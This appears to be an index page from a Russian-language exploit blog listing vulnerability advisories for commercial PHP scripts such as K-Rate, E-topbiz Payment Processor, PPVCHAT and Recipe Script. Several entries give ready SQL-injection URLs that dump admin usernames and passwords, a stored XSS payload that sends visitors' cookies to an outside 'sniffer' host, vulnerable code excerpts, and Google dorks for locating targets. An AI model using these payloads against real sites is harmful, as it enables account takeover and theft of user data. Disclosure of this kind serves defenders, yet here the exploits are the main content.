Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Application: Irokez Blog
Website: http://irokez.org
Version: All (0.7.3.2)
Date: 11-02-2009

Прочтите эту запись до конца »

Jamit Job Board SQL-INJECTION, XSS

Еще в прошлом году на Милворме был выложен адвайс Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability. Как это часто бывает, в качестве конечного эксплоита была указана лишь строка для просмотра версии mysql, причем автор особо и не разобрался в сути уязвимости(самая обычная инъекция, какая еще blind?! 0o). После разбора хлама на винчестере я нашел свою версию advisory, написанную еще летом прошлого года.

Прочтите эту запись до конца »

K-Rate SQL-INJECTION, XSS

Application: K-Rate

Website: http://turn-k.net/k-rate

Version: All

About: K-Rate picture rating script. Price 115$.

Googledork: Powered by K-Rate

Date: 01-07-2008

Прочтите эту запись до конца »

Xpoz SQL-INJECTION, XSS

Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All (current 1.0)

About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008

Прочтите эту запись до конца »

E-topbiz Payment Processor 2 SQL-INJECTION

Application: E-topbiz Payment Processor 2

Version: 2.0

Website: http://e-topbiz.com/oprema/pages/pproc2.php

Demo: http://e-topbiz.com/trafficdemos/payment2/

About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0×3a,version())

K-Links Directory SQL-INJECTION, XSS

Application: K-Links Directory

Website: http://turn-k.net/k-links

Version: Platinum (All)

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.

Googledork: Powered By K-Links Directory

Demo: http://klinksdemo.com

Date: 24-07-2008

Прочтите эту запись до конца »

PPVCHAT ACTIVE XSS

Application: PPVCHAT

Website: http://ppvchat.com

Version: All

About: Pay-per-view adult video chat software. Price 999$.

Googledork: Copyright © 2006 PPVChat.com

Date: 05-07-2008

Description:

При регистрации новых пользователей/моделей нет фильтрации полей.

===>>> Exploit:

<script>img = new Image(); img.src = «http://sniffer/sniff.jpg?»+document.cookie;</script>

Dating 3 PHP Script SQL-INJECTION

Application: E-topbiz Dating 3 PHP Script

Website: http://e-topbiz.com/oprema/pages/dating3.php

Demo: http://e-topbiz.com/trafficdemos/dating3

Version: 3.0

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.

Date: 01-08-2008

[ VULNERABLE CODE ]

members/mail.php

if($action==inbox) {
$result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");
if($action==veiw) {
$result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");

===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0×3a,password),5,6,7 from admin/*

Recipe Script SQL-INJECTION

Application: Recipe Script

Version: 6.0

Website: http://fivedollarscripts.com

Demo: http://recipebag.com

Date: 03-08-2008

[ VULNERABLE CODE ]

viewrecipe.php

$sql="select * from recipe where recipeid=$recid";
$res=mysql_query($sql);
$result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid");
if(mysql_num_rows($result))do it");

===>>> Exploit:

http://host/blabla-0 union select 1,2,concat(username,0×3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php

// Admin Login – http:/host/admin2